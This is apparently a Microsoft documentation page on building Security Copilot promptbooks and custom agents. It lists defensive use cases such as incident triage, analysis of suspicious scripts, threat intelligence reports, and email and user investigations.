Note
Access to this page requires authorization. You can try signing in or changing directories.
Access to this page requires authorization. You can try changing directories.
Important
Some information in this article relates to a prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
Microsoft Security Copilot provides advanced automation capabilities to help you tackle real challenges in security and IT operations including Security Copilot promptbooks and Security Copilot agents.
Security Copilot promptbooks can be leveraged to build automations that follow a deterministic and linear workflow.
Security Copilot agents can be leveraged to build automations for deterministic or nondeterministic workflows. In nondeterministic workflows, the agents leverage tools and instructions to develop a dynamic plan for achieving its outcome. Agents also provide added functionalities such as the ability to trigger on a schedule and to learn from user feedback.
You can choose to build promptbooks or agents depending on your security and IT operations scenarios and use cases.
Use cases for custom agents
Custom Security Copilot agents can be developed for any use case. The following are some ideas that you can consider to enhance security and IT operations by:
Agent that performs a comprehensive investigation of Microsoft Defender security incidents by analyzing incident details, extracting entities, and correlating with Microsoft Sentinel incidents for enriched context. It concludes with a detailed verdict analysis that determines if the incident is a true positive, false positive, or requires further investigation, along with recommended follow-up steps.
Agent that analyzes suspicious code snippets or scripts to determine their malicious nature and extracts indicators of compromise (IOCs) such as IP addresses and domains. The agent then gathers threat intelligence on the extracted IOCs and checks if any organizational devices have communicated with these potentially malicious indicators in the past seven days.
Agent that generates comprehensive threat intelligence reports based on user input and searches for associated Common Vulnerabilities and Exposures (CVE) in Microsoft Defender tables. It analyzes threat actors, tools, and vulnerabilities while identifying impacted devices in the environment and providing mitigation strategies.
Agent that conducts comprehensive email investigations by analyzing suspicious emails across Microsoft Entra ID, Defender, Sentinel, and Microsoft Defender Threat Intelligence platform. It examines email details, sender history, attachment interactions, URL select, user sign-in activity, and entity reputations to provide security recommendations and determine compromise indicators.
Agent that performs comprehensive user investigations by collecting and analyzing data from multiple security platforms including Entra ID, Intune, and Microsoft Sentinel. It examines user details, risk levels, audit logs, sign-in patterns, device compliance, IP reputations, and security alerts to produce an executive-level investigative summary.